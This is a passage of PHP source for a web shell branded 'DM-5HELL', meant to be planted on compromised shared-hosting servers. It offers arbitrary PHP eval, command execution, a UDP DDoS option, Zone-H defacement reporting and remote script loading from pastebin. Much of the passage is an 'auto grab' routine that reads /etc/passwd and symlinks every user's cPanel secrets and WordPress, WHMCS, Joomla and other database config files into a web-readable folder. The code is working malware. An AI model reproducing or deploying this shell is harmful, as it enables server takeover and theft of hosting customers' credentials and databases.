  2869. .awesomeget{position:relative}.awesomeget:after{font-family:FontAwesome;content:"\f058";font-size:15px;position:absolute;right:17px;top:0.0em;pointer-events:none}
  2870. .view_images{width:100%;max-width:800px;height:auto}</style>
  2871. <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">
  2872. <script src="https://code.jquery.com/jquery-latest.min.js"></script>
  2873. <script>$(document).ready(function(){$('#cmd').focus()});</script>
  2874. <?php
  2875. if(isset($_GET['x'])&&($_GET['x']=='phpmyadmin')){
  2876. echo'<script type="text/javascript" src="https://pastebin.com/raw/iqfC58Fh"></script>';
  2877. }
  2878. echo'</head><body>
  2879. <div class="main"><div class="head_info">
  2880. <table align="center"><tr><td><table class="b_tbl"><tr><td>
  2881. <span id="logo"><a href="'.PHPSELF.'" target="_blank">DM</a></span>
  2882. </td></tr>
  2883. <tr><td><b><span class="b1">DM-5HELL</span></b></td></tr>
  2884. <tr><td><b><span style="font-size:15px;padding:0;color:#ff0000;">[root@RHEL5 ~]# whoami</span></b></td></tr>
  2885. </table>
  2886. </td><td class="inf">'.$buff.'</td></tr>
  2887. </table></div>
  2888. <div id="menu" align="center">
  2889. <table><tr>
  2890. <td style="text-align:center;"><a href="?dm='.$pwd.'">Home</a></td>
  2891. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=phpinfo">Phpinfo</a></td>
  2892. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=domain">Domain</a></td>
  2893. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=adminer">Adminer</a></td>
  2894. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=phpmyadmin">Sql Manager</a></td>
  2895. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=upload">Upload</a></td>
  2896. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=mail">Mailer</a></td>
  2897. </tr></table></div>
  2898. <div id="menu" align="center">
  2899. <table><tr>
  2900. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=ckperl">Perl</a></td>
  2901. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=php">Eval</a></td>
  2902. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=grabber">Grab</a></td>
  2903. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=autograbber">Auto Grab</a></td>
  2904. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=jumping">Jumping</a></td>
  2905. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=shell">Command</a></td>
  2906. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=dmsec1">Htaccess</a></td>
  2907. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=dmsec2">Php.ini</a></td>
  2908. </tr></table></div>
  2909. <div id="menu" align="center"><table><tr>
  2910. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=dmsec3">Basedir</a></td>
  2911. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=dmsec4">Prosess</a></td>
  2912. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=apache">Apache</a></td>
  2913. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=hostgator">Hosgator</a></td>
  2914. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=limehost">Bluehost</a></td>
  2915. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=ovh">Ovh</a></td>
  2916. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=litespeed">Nginx</a></td>
  2917. </tr></table></div>
  2918. <div id="menu" align="center"><table><tr>
  2919. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=dmsym1">Symlink 1</a></td>
  2920. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=dmsym2">Symlink 2</a></td>
  2921. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=dmsym3">Symlink 3</a></td>
  2922. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=dmsym4">Symlink 4</a></td>
  2923. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=dmsym5">Symlink 5</a></td>
  2924. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=dmsym6">Symlink 6</a></td>
  2925. </tr></table></div>
  2926. <div id="menu" align="center"><table><tr>
  2927. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=cgi2012">Cgi 2012</a></td>
  2928. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=iis7">Iis 7.5</a></td>
  2929. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=bomail">Bom Email</a></td>
  2930. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=dmwp">Wp</a></td>
  2931. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=dmjm">Joomla</a></td>
  2932. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=dmvb">Vb</a></td>
  2933. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=skype">Skype</a></td>
  2934. </tr></table></div>
  2935. <div id="menu" align="center"><table><tr>
  2936. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=whmcs2">Whmcs</a></td>
  2937. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=plesk">Plesk</a></td>
  2938. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=reseller">Reseller</a></td>
  2939. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=cpanel">Cpanel</a></td>
  2940. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=crypter">Encript</a></td>
  2941. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=unzip">Unzip</a></td>
  2942. </tr></table></div>
  2943. <div id="menu" align="center"><table><tr>
  2944. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=ns">Netsploit</a></td>
  2945. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=coding">Encode</a></td>
  2946. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=analyzer">Analyzer</a></td>
  2947. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=tools">Other Tool</a></td>
  2948. </tr></table></div>
  2949. <div id="menu" align="center"><table><tr>
  2950. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=clog">Log</a></td>
  2951. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=sscan">Shell Scan</a></td>
  2952. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=pscan">Port Scan</a></td>
  2953. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=phpddos">Udp Ddos</a></td></tr></table></div>
  2954. <div id="menu" align="center"><table><tr>
  2955. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=about">About</a></td>
  2956. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=kill">Kill Me</a></td>
  2957. <td style="text-align:center;"><a href="?dm='.$pwd.'&x=logout">Log Out</a></td>
  2958. </tr></table></div>';
  2959. if(isset($_GET['x'])&&($_GET['x']=='php')){
  2960. echo'<form action="?dm='.$pwd.'&amp;x=php" method="post">
  2961. <table class="cmdbox"><tr><td>
  2962. <textarea class="output" name="cmd" id="cmd">';if(isset($_POST['submitcmd'])){echo eval(magicboom($_POST['cmd']));}else{echo"echo file_get_contents('/etc/passwd');";}echo'</textarea>
  2963. </td></tr>
  2964. <tr><td align="center"><input class="inputzbut" type="submit" name="submitcmd" /></td></tr></table>
  2965. </form>';
  2966. }elseif(isset($_GET['x'])&&($_GET['x']=='tools')){
  2967. echo'<center>
  2968. <br/><b><span class="b7">O=:[ MULTY TOOLS ]:=O</span></b><br/><br/>
  2969. <div id="menu" align="center"><table><tr>
  2970. <td align=center><b><a href="?dm='.$pwd.'&amp;x=zoneh">ZONE-H</a></b></td>
  2971. <td align=center><b><a href="?dm='.$pwd.'&amp;x=">KOSONG 1</a></b></td>
  2972. <td align=center><b><a href="?dm='.$pwd.'&amp;x=">KOSONG 2</a></b></td>
  2973. <td align=center><b><a href="?dm='.$pwd.'&amp;x=">KOSONG 3</a></b></td>
  2974. </tr></table></div>';
  2975.  
  2976. }elseif(isset($_GET['x'])&&($_GET['x']=='zoneh')){
  2977. echo'<center><br/><b><span class="b7">O=:[ ZONE-H ]:=O</span></b><br/><br/><form action="?dm='.$pwd.'&amp;x=zoneh" method="post">
  2978. <input type="text" placeholder="Notifer Name (Aganteng)" name="defacer" size="60">
  2979. <br><textarea name="domains" placeholder="List Domain"></textarea><br>
  2980. <input type="submit" name="go"></form><br><br>';
  2981. if(isset($_POST['go'])){
  2982. if($_POST['defacer']){
  2983. $defacer=$_POST['defacer'];
  2984. }else{
  2985. $defacer='C0nn3ct10n 3rr0r';
  2986. }
  2987. if($_POST['domains']){
  2988. foreach(explode("\n",trim($_POST['domains'])) as $domain){
  2989. zoneh($domain,$defacer);
  2990. }
  2991. echo'<a href="http://zone-h.com/archive/published=0" target="_blank">Check</a>';
  2992. }
  2993. }
  2994. echo'</center>';
  2995.  
  2996. }elseif(isset($_GET['x'])&&($_GET['x']=='kill')){
  2997. $a=array('ckperl','telnet','angel','hacked');
  2998. foreach($a as $b){
  2999. if(delete_option($b)){
  3000. }elseif(exe('rm -rf '.$b)){
  3001. }else{
  3002. palbtn($b);
  3003. }
  3004. }
  3005. if(isset($_SERVER['HTTP_COOKIE'])){
  3006. $cookies=explode(';',$_SERVER['HTTP_COOKIE']);
  3007. foreach($cookies as $cookie) {
  3008. $parts=explode('=',$cookie);
  3009. $name=trim($parts[0]);
  3010. setcookie($name,'',time()-(60*(60*60*360000)));
  3011. }
  3012. }else{
  3013. foreach($_COOKIE as $delc=>$value){
  3014. setcookie($delc,'',time()-(60*(60*60*360000)));
  3015. }
  3016. }
  3017. unlink(basename($_SERVER['SCRIPT_NAME']));
  3018. setcookie('Page_Login','', time()-(60*(60*60*360000)));
  3019. echo'<meta http-equiv="refresh" content="2; url='.lokasi.'"><center><br /><b><span class="b7"> Please Wait ...</span></center>';
  3020.  
  3021. }elseif(isset($_GET['x'])&&($_GET['x']=='autograbber')){
  3022. echo "<center><b><span class='b7'>O=:[ Auto Grab Config ]:=O</span></b><br />Checking Functions ...<br>";
  3023. if(preg_match('/symlink|copy/',ini_get('disable_function'))) {
  3024. echo "<br/><span class='b9'FUNCTIONS SYMLINK IS ON => HAJAR TERUS GAN</span><br/></center>";
  3025. }
  3026. @mkdir('hacked', 0755);
  3027. @chdir('hacked');
  3028. @symlink('/','auto_grab_root');
  3029. simpan(".htaccess","Options all\nOptions +Indexes\nOptions +FollowSymLinks\nDirectoryIndex Sux.html\nAddType text/plain .php\nAddHandler server-parsed .php\nAddType text/plain .html\nAddHandler txt .html\nSatisfy Any");
  3030. @mkdir('auto_grab', 0755);
  3031. @chdir('auto_grab');
  3032. simpan(".htaccess","Options all\nOptions +Indexes\nOptions +FollowSymLinks\nDirectoryIndex Sux.html\nAddType text/plain .php\nAddHandler server-parsed .php\nAddType text/plain .html\nAddHandler txt .html\nSatisfy Any");
  3033. @mkdir('exe', 0755);
  3034. simpan("$pwdhacked/auto_grab/exe/.htaccess","Options all\nOptions +Indexes\nOptions +FollowSymLinks\nDirectoryIndex Sux.html\nAddType text/plain .php\nAddHandler server-parsed .php\nAddType text/plain .html\nAddHandler txt .html\nSatisfy Any");
  3035. @mkdir('sym', 0755);
  3036. simpan("$pwdhacked/auto_grab/sym/.htaccess","Options all\nOptions +Indexes\nOptions +FollowSymLinks\nDirectoryIndex Sux.html\nAddType text/plain .php\nAddHandler server-parsed .php\nAddType text/plain .html\nAddHandler txt .html\nSatisfy Any");
  3037. if(is_readable('/etc/passwd')){$etcpa='/etc/passwd';}else{$etcpa='/etc/passwd-';}
  3038. simpan('passwd', file_get_contents($etcpa));
  3039. $passwd=explode("\n",file_get_contents($etcpa));
  3040. echo "Start Symlinking ...<br>";
  3041. @ini_set('max_execution_time',0);
  3042. @set_time_limit(0);
  3043. foreach($passwd as $pwd_){
  3044. $pawd=explode(':',$pwd_);
  3045. $i=$pawd[0];
  3046. exe("ln -s /root/.accesshash exe/root_AccessHash.txt");
  3047. exe("ln -s /home/$i/.my.cnf exe/$i-my.cnf_cPanel.txt");
  3048. exe("ln -s /home/$i/.accesshash exe/$i-AccessHash_Whm.txt");
  3049. exe("ln -s /home/$i/cpanel3-skel exe/$i-RESELLER");
  3050. exe("ln -s /home/$i/.cpanel exe/$i-cachesconfig");
  3051. exe("ln -s /home/$i/public_html/includes/configure.php exe/$i-shop.txt");
  3052. exe("ln -s /home/$i/public_html/soporte/configuration.php exe/$i-soporte-whmcs.txt");
  3053. exe("ln -s /home/$i/public_html/painel-do-cliente/configuration.php exe/$i-painel-do-cliente-whmcs.txt");
  3054. exe("ln -s /home/$i/public_html/financeiro/configuration.php exe/$i-financeiro_whmcs.txt");
  3055. exe("ln -s /home/$i/public_html/os/includes/configure.php exe/$i-shop-os.txt");
  3056. exe("ln -s /home/$i/public_html/oscom/includes/configure.php exe/$i-oscom.txt");
  3057. exe("ln -s /home/$i/public_html/oscommerce/includes/configure.php exe/$i-oscommerce.txt");
  3058. exe("ln -s /home/$i/public_html/oscommerces/includes/configure.php exe/$i-oscommerces.txt");
  3059. exe("ln -s /home/$i/public_html/shop/includes/configure.php exe/$i-shop2.txt");
  3060. exe("ln -s /home/$i/public_html/shopping/includes/configure.php exe/$i-shop-shopping.txt");
  3061. exe("ln -s /home/$i/public_html/sale/includes/configure.php exe/$i-sale.txt");
  3062. exe("ln -s /home/$i/public_html/amember/config.inc.php exe/$i-amember.txt");
  3063. exe("ln -s /home/$i/public_html/config.inc.php exe/$i-amember2.txt");
  3064. exe("ln -s /home/$i/public_html/member/config.php exe/$i-member-config73.txt");
  3065. exe("ln -s /home/$i/public_html/member/configuration.php exe/$i-member-configuration457.txt");
  3066. exe("ln -s /home/$i/public_html/members/configuration.php exe/$i-members-configuration8768.txt");
  3067. exe("ln -s /home/$i/public_html/members/config.php exe/$i-members-configuration47533.txt");
  3068. exe("ln -s /home/$i/public_html/config.php exe/$i-4images1.txt");
  3069. exe("ln -s /home/$i/public_html/forum/includes/config.php exe/$i-forum.txt");
  3070. exe("ln -s /home/$i/public_html/forums/includes/config.php exe/$i-forums.txt");
  3071. exe("ln -s /home/$i/public_html/admin/conf.php exe/$i-5.txt");
  3072. exe("ln -s /home/$i/public_html/admin/config.php exe/$i-4.txt");
  3073. exe("ln -s /home/$i/public_html/wp-config.php exe/$i-WordPress.txt");
  3074. exe("ln -s /home/$i/public_html/wp/wp-config.php exe/$i-WordPress-wp.txt");
  3075. exe("ln -s /home/$i/public_html/WP/wp-config.php exe/$i-WordPress-WP.txt");
  3076. exe("ln -s /home/$i/public_html/wp/beta/wp-config.php exe/$i-WordPress-wp-beta.txt");
  3077. exe("ln -s /home/$i/public_html/beta/wp-config.php exe/$i-WordPress-beta.txt");
  3078. exe("ln -s /home/$i/public_html/press/wp-config.php exe/$i-WordPress-press.txt");
  3079. exe("ln -s /home/$i/public_html/wordpress/wp-config.php exe/$i-WordPress-wordpress.txt");
  3080. exe("ln -s /home/$i/public_html/Wordpress/wp-config.php exe/$i-WordPress-Wordpress.txt");
  3081. exe("ln -s /home/$i/public_html/blog/wp-config.php exe/$i-WordPress-Wordpress.txt");
  3082. exe("ln -s /home/$i/public_html/wordpress/beta/wp-config.php exe/$i-WordPress-wordpress-beta.txt");
  3083. exe("ln -s /home/$i/public_html/news/wp-config.php exe/$i-WordPress-news.txt");
  3084. exe("ln -s /home/$i/public_html/new/wp-config.php exe/$i-WordPress-new.txt");
  3085. exe("ln -s /home/$i/public_html/blog/wp-config.php exe/$i-WordPress-blog.txt");
  3086. exe("ln -s /home/$i/public_html/beta/wp-config.php exe/$i-WordPress-beta.txt");
  3087. exe("ln -s /home/$i/public_html/blogs/wp-config.php exe/$i-WordPress-blogs.txt");
  3088. exe("ln -s /home/$i/public_html/home/wp-config.php exe/$i-WordPress-home.txt");
  3089. exe("ln -s /home/$i/public_html/protal/wp-config.php exe/$i-WordPress-protal.txt");
  3090. exe("ln -s /home/$i/public_html/site/wp-config.php exe/$i-WordPress-site.txt");
  3091. exe("ln -s /home/$i/public_html/main/wp-config.php exe/$i-WordPress-main.txt");
  3092. exe("ln -s /home/$i/public_html/test/wp-config.php exe/$i-WordPress-test.txt");
  3093. exe("ln -s /home/$i/public_html/arcade/functions/dbclass.php exe/$i-ibproarcade.txt");
  3094. exe("ln -s /home/$i/public_html/arcade/functions/dbclass.php exe/$i-ibproarcade.txt");
  3095. exe("ln -s /home/$i/public_html/joomla/configuration.php exe/$i-joomla2.txt");
  3096. exe("ln -s /home/$i/public_html/protal/configuration.php exe/$i-joomla-protal.txt");
  3097. exe("ln -s /home/$i/public_html/joo/configuration.php exe/$i-joo.txt");
  3098. exe("ln -s /home/$i/public_html/cms/configuration.php exe/$i-joomla-cms.txt");
  3099. exe("ln -s /home/$i/public_html/site/configuration.php exe/$i-joomla-site.txt");
  3100. exe("ln -s /home/$i/public_html/main/configuration.php exe/$i-joomla-main.txt");
  3101. exe("ln -s /home/$i/public_html/news/configuration.php exe/$i-joomla-news.txt");
  3102. exe("ln -s /home/$i/public_html/new/configuration.php exe/$i-joomla-new.txt");
  3103. exe("ln -s /home/$i/public_html/home/configuration.php exe/$i-joomla-home.txt");
  3104. exe("ln -s /home/$i/public_html/vb/includes/config.php exe/$i-vb-config.txt");
  3105. exe("ln -s /home/$i/public_html/vb3/includes/config.php exe/$i-vb3-config.txt");
  3106. exe("ln -s /home/$i/public_html/cc/includes/config.php exe/$i-vb1-config.txt");
  3107. exe("ln -s /home/$i/public_html/includes/config.php exe/$i-includes-vb.txt");
  3108. exe("ln -s /home/$i/public_html/forum/includes/class_core.php exe/$i-vbluttin-class_core.php.txt");
  3109. exe("ln -s /home/$i/public_html/vb/includes/class_core.php exe/$i-vbluttin-class_core.php1.txt");
  3110. exe("ln -s /home/$i/public_html/cc/includes/class_core.php exe/$i-vbluttin-class_core.php2.txt");
  3111. exe("ln -s /home/$i/public_html/cliente/configuration.php exe/$i-whmcs_cliente.txt");
  3112. exe("ln -s /home/$i/public_html/whm/configuration.php exe/$i-whm15.txt");
  3113. exe("ln -s /home/$i/public_html/central/configuration.php exe/$i-whm-central.txt");
  3114. exe("ln -s /home/$i/public_html/whm/whmcs/configuration.php exe/$i-whm-whmcs.txt");
  3115. exe("ln -s /home/$i/public_html/whm/WHMCS/configuration.php exe/$i-whm-WHMCS.txt");
  3116. exe("ln -s /home/$i/public_html/whmc/WHM/configuration.php exe/$i-whmc-WHM.txt");
  3117. exe("ln -s /home/$i/public_html/whmcs/configuration.php exe/$i-whmcs.txt");
  3118. exe("ln -s /home/$i/public_html/support/configuration.php exe/$i-support.txt");
  3119. exe("ln -s /home/$i/public_html/supp/configuration.php exe/$i-supp.txt");
  3120. exe("ln -s /home/$i/public_html/secure/configuration.php exe/$i-sucure.txt");
  3121. exe("ln -s /home/$i/public_html/secure/whm/configuration.php exe/$i-sucure-whm.txt");
  3122. exe("ln -s /home/$i/public_html/secure/whmcs/configuration.php exe/$i-sucure-whmcs.txt");
  3123. exe("ln -s /home/$i/public_html/cpanel/configuration.php exe/$i-cpanel.txt");
  3124. exe("ln -s /home/$i/public_html/panel/configuration.php exe/$i-panel.txt");
  3125. exe("ln -s /home/$i/public_html/host/configuration.php exe/$i-host.txt");
  3126. exe("ln -s /home/$i/public_html/hosting/configuration.php exe/$i-hosting.txt");
  3127. exe("ln -s /home/$i/public_html/hosts/configuration.php exe/$i-hosts.txt");
  3128. exe("ln -s /home/$i/public_html/configuration.php exe/$i-joomla.txt");
  3129. exe("ln -s /home/$i/public_html/submitticket.php exe/$i-whmcs2.txt");
  3130. exe("ln -s /home/$i/public_html/clients/configuration.php exe/$i-clients.txt");
  3131. exe("ln -s /home/$i/public_html/client/configuration.php exe/$i-client.txt");
  3132. exe("ln -s /home/$i/public_html/clientes/configuration.php exe/$i-clientes.txt");
  3133. exe("ln -s /home/$i/public_html/cliente/configuration.php exe/$i-client.txt");
  3134. exe("ln -s /home/$i/public_html/clientsupport/configuration.php exe/$i-clientsupport.txt");
  3135. exe("ln -s /home/$i/public_html/billing/configuration.php exe/$i-billing.txt");
  3136. exe("ln -s /home/$i/public_html/manage/configuration.php exe/$i-whm-manage.txt");
  3137. exe("ln -s /home/$i/public_html/my/configuration.php exe/$i-whm-my.txt");
  3138. exe("ln -s /home/$i/public_html/myshop/configuration.php exe/$i-whm-myshop.txt");
  3139. exe("ln -s /home/$i/public_html/includes/dist-configure.php exe/$i-zencart.txt");
  3140. exe("ln -s /home/$i/public_html/zencart/includes/dist-configure.php exe/$i-shop-zencart.txt");
  3141. exe("ln -s /home/$i/public_html/shop/includes/dist-configure.php exe/$i-shop-ZCshop.txt");
  3142. exe("ln -s /home/$i/public_html/Settings.php exe/$i-smf.txt");
  3143. exe("ln -s /home/$i/public_html/smf/Settings.php exe/$i-smf2.txt");
  3144. exe("ln -s /home/$i/public_html/forum/Settings.php exe/$i-smf-forum.txt");
  3145. exe("ln -s /home/$i/public_html/forums/Settings.php exe/$i-smf-forums.txt");
  3146. exe("ln -s /home/$i/public_html/upload/includes/config.php exe/$i-up.txt");
  3147. exe("ln -s /home/$i/public_html/article/config.php exe/$i-Nwahy.txt");
  3148. exe("ln -s /home/$i/public_html/up/includes/config.php exe/$i-up2.txt");
  3149. exe("ln -s /home/$i/public_html/conf_global.php exe/$i-6.txt");
  3150. exe("ln -s /home/$i/public_html/include/db.php exe/$i-7.txt");
  3151. exe("ln -s /home/$i/public_html/connect.php exe/$i-PHP-Fusion.txt");
  3152. exe("ln -s /home/$i/public_html/mk_conf.php exe/$i-9.txt");
  3153. exe("ln -s /home/$i/public_html/includes/config.php exe/$i-traidnt1.txt");
  3154. exe("ln -s /home/$i/public_html/config.php exe/$i-4images.txt");
  3155. exe("ln -s /home/$i/public_html/sites/default/settings.php exe/$i-Drupal.txt");
  3156. exe("ln -s /home/$i/public_html/member/configuration.php exe/$i-1member-configuration425.txt");
  3157. exe("ln -s /home/$i/public_html/billings/configuration.php exe/$i-billings.txt");
  3158. exe("ln -s /home/$i/public_html/whm/configuration.php exe/$i-whm.txt");
  3159. exe("ln -s /home/$i/public_html/supports/configuration.php exe/$i-supports.txt");
  3160. exe("ln -s /home/$i/public_html/requires/config.php exe/$i-AM4SS-hosting.txt");
  3161. exe("ln -s /home/$i/public_html/supports/includes/iso4217.php exe/$i-hostbills-supports.txt");
  3162. exe("ln -s /home/$i/public_html/client/includes/iso4217.php exe/$i-hostbills-client.txt");
  3163. exe("ln -s /home/$i/public_html/support/includes/iso4217.php exe/$i-hostbills-support.txt");
  3164. exe("ln -s /home/$i/public_html/billing/includes/iso4217.php exe/$i-hostbills-billing.txt");
  3165. exe("ln -s /home/$i/public_html/billings/includes/iso4217.php exe/$i-hostbills-billings.txt");
  3166. exe("ln -s /home/$i/public_html/host/includes/iso4217.php exe/$i-hostbills-host.txt");
  3167. exe("ln -s /home/$i/public_html/hosts/includes/iso4217.php exe/$i-hostbills-hosts.txt");
  3168. exe("ln -s /home/$i/public_html/hosting/includes/iso4217.php exe/$i-hostbills-hosting.txt");
  3169. exe("ln -s /home/$i/public_html/hostings/includes/iso4217.php exe/$i-hostbills-hostings.txt");
  3170. exe("ln -s /home/$i/public_html/includes/iso4217.php exe/$i-hostbills.txt");
  3171. exe("ln -s /home/$i/public_html/hostbills/includes/iso4217.php exe/$i-hostbills-hostbills.txt");
  3172. exe("ln -s /home/$i/public_html/hostbill/includes/iso4217.php exe/$i-hostbills-hostbill.txt");
  3173. exe("ln -s /home/$i/public_html/bb-config.php exe/$i-bb-config.txt");
  3174.  
  3175. @symlink("/root/.accesshash","sym/root_AccessHash.txt");
  3176. @symlink("/home/$i/.my.cnf","sym/$i-my.cnf_cPanel.txt");
  3177. @symlink("/home/$i/.accesshash","sym/$i-AccessHash_Whm.txt");
  3178. @symlink("/home/$i/cpanel3-skel","sym/$i-RESELLER");
  3179. @symlink("/home/$i/.cpanel","sym/$i-cachesconfig");
  3180. @symlink("/home/$i/public_html/includes/configure.php","sym/$i-shop.txt");
  3181. @symlink("/home/$i/public_html/soporte/configuration.php","sym/$i-soporte-whmcs.txt");
  3182. @symlink("/home/$i/public_html/painel-do-cliente/configuration.php","sym/$i-painel-do-cliente-whmcs.txt");
  3183. @symlink("/home/$i/public_html/financeiro/configuration.php","sym/$i-financeiro_whmcs.txt");
  3184. @symlink("/home/$i/public_html/os/includes/configure.php","sym/$i-shop-os.txt");
  3185. @symlink("/home/$i/public_html/oscom/includes/configure.php","sym/$i-oscom.txt");
  3186. @symlink("/home/$i/public_html/oscommerce/includes/configure.php","sym/$i-oscommerce.txt");
  3187. @symlink("/home/$i/public_html/oscommerces/includes/configure.php","sym/$i-oscommerces.txt");
  3188. @symlink("/home/$i/public_html/shop/includes/configure.php","sym/$i-shop2.txt");
  3189. @symlink("/home/$i/public_html/shopping/includes/configure.php","sym/$i-shop-shopping.txt");
  3190. @symlink("/home/$i/public_html/sale/includes/configure.php","sym/$i-sale.txt");
  3191. @symlink("/home/$i/public_html/amember/config.inc.php","sym/$i-amember.txt");
  3192. @symlink("/home/$i/public_html/config.inc.php","sym/$i-amember2.txt");
  3193. @symlink("/home/$i/public_html/member/config.php","sym/$i-member-config73.txt");
  3194. @symlink("/home/$i/public_html/member/configuration.php","sym/$i-member-configuration457.txt");
  3195. @symlink("/home/$i/public_html/members/configuration.php","sym/$i-members-configuration8768.txt");
  3196. @symlink("/home/$i/public_html/members/config.php","sym/$i-members-configuration47533.txt");
  3197. @symlink("/home/$i/public_html/config.php","sym/$i-4images1.txt");
  3198. @symlink("/home/$i/public_html/forum/includes/config.php","sym/$i-forum.txt");
  3199. @symlink("/home/$i/public_html/forums/includes/config.php","sym/$i-forums.txt");
  3200. @symlink("/home/$i/public_html/admin/conf.php","sym/$i-5.txt");
  3201. @symlink("/home/$i/public_html/admin/config.php","sym/$i-4.txt");
  3202. @symlink("/home/$i/public_html/wp-config.php","sym/$i-WordPress.txt");
  3203. @symlink("/home/$i/public_html/wp/wp-config.php","sym/$i-WordPress-wp.txt");
  3204. @symlink("/home/$i/public_html/WP/wp-config.php","sym/$i-WordPress-WP.txt");
  3205. @symlink("/home/$i/public_html/wp/beta/wp-config.php","sym/$i-WordPress-wp-beta.txt");
  3206. @symlink("/home/$i/public_html/beta/wp-config.php","sym/$i-WordPress-beta.txt");
  3207. @symlink("/home/$i/public_html/press/wp-config.php","sym/$i-WordPress-press.txt");
  3208. @symlink("/home/$i/public_html/wordpress/wp-config.php","sym/$i-WordPress-wordpress.txt");
  3209. @symlink("/home/$i/public_html/Wordpress/wp-config.php","sym/$i-WordPress-Wordpress.txt");
  3210. @symlink("/home/$i/public_html/blog/wp-config.php","sym/$i-WordPress-Wordpress.txt");
  3211. @symlink("/home/$i/public_html/wordpress/beta/wp-config.php","sym/$i-WordPress-wordpress-beta.txt");
  3212. @symlink("/home/$i/public_html/news/wp-config.php","sym/$i-WordPress-news.txt");
  3213. @symlink("/home/$i/public_html/new/wp-config.php","sym/$i-WordPress-new.txt");
  3214. @symlink("/home/$i/public_html/blog/wp-config.php","sym/$i-WordPress-blog.txt");
  3215. @symlink("/home/$i/public_html/beta/wp-config.php","sym/$i-WordPress-beta.txt");
  3216. @symlink("/home/$i/public_html/blogs/wp-config.php","sym/$i-WordPress-blogs.txt");
  3217. @symlink("/home/$i/public_html/home/wp-config.php","sym/$i-WordPress-home.txt");
  3218. @symlink("/home/$i/public_html/protal/wp-config.php","sym/$i-WordPress-protal.txt");
  3219. @symlink("/home/$i/public_html/site/wp-config.php","sym/$i-WordPress-site.txt");
  3220. @symlink("/home/$i/public_html/main/wp-config.php","sym/$i-WordPress-main.txt");
  3221. @symlink("/home/$i/public_html/test/wp-config.php","sym/$i-WordPress-test.txt");
  3222. @symlink("/home/$i/public_html/arcade/functions/dbclass.php","sym/$i-ibproarcade.txt");
  3223. @symlink("/home/$i/public_html/arcade/functions/dbclass.php","sym/$i-ibproarcade.txt");
  3224. @symlink("/home/$i/public_html/joomla/configuration.php","sym/$i-joomla2.txt");
  3225. @symlink("/home/$i/public_html/protal/configuration.php","sym/$i-joomla-protal.txt");
  3226. @symlink("/home/$i/public_html/joo/configuration.php","sym/$i-joo.txt");
  3227. @symlink("/home/$i/public_html/cms/configuration.php","sym/$i-joomla-cms.txt");
  3228. @symlink("/home/$i/public_html/site/configuration.php","sym/$i-joomla-site.txt");
  3229. @symlink("/home/$i/public_html/main/configuration.php","sym/$i-joomla-main.txt");
  3230. @symlink("/home/$i/public_html/news/configuration.php","sym/$i-joomla-news.txt");
  3231. @symlink("/home/$i/public_html/new/configuration.php","sym/$i-joomla-new.txt");
  3232. @symlink("/home/$i/public_html/home/configuration.php","sym/$i-joomla-home.txt");
  3233. @symlink("/home/$i/public_html/vb/includes/config.php","sym/$i-vb-config.txt");
  3234. @symlink("/home/$i/public_html/vb3/includes/config.php","sym/$i-vb3-config.txt");
  3235. @symlink("/home/$i/public_html/cc/includes/config.php","sym/$i-vb1-config.txt");
  3236. @symlink("/home/$i/public_html/includes/config.php","sym/$i-includes-vb.txt");
  3237. @symlink("/home/$i/public_html/forum/includes/class_core.php","sym/$i-vbluttin-class_core.php.txt");
  3238. @symlink("/home/$i/public_html/vb/includes/class_core.php","sym/$i-vbluttin-class_core.php1.txt");
  3239. @symlink("/home/$i/public_html/cc/includes/class_core.php","sym/$i-vbluttin-class_core.php2.txt");
  3240. @symlink("/home/$i/public_html/cliente/configuration.php","sym/$i-whmcs_cliente.txt");
  3241. @symlink("/home/$i/public_html/whm/configuration.php","sym/$i-whm15.txt");
  3242. @symlink("/home/$i/public_html/central/configuration.php","sym/$i-whm-central.txt");
  3243. @symlink("/home/$i/public_html/whm/whmcs/configuration.php","sym/$i-whm-whmcs.txt");
  3244. @symlink("/home/$i/public_html/whm/WHMCS/configuration.php","sym/$i-whm-WHMCS.txt");
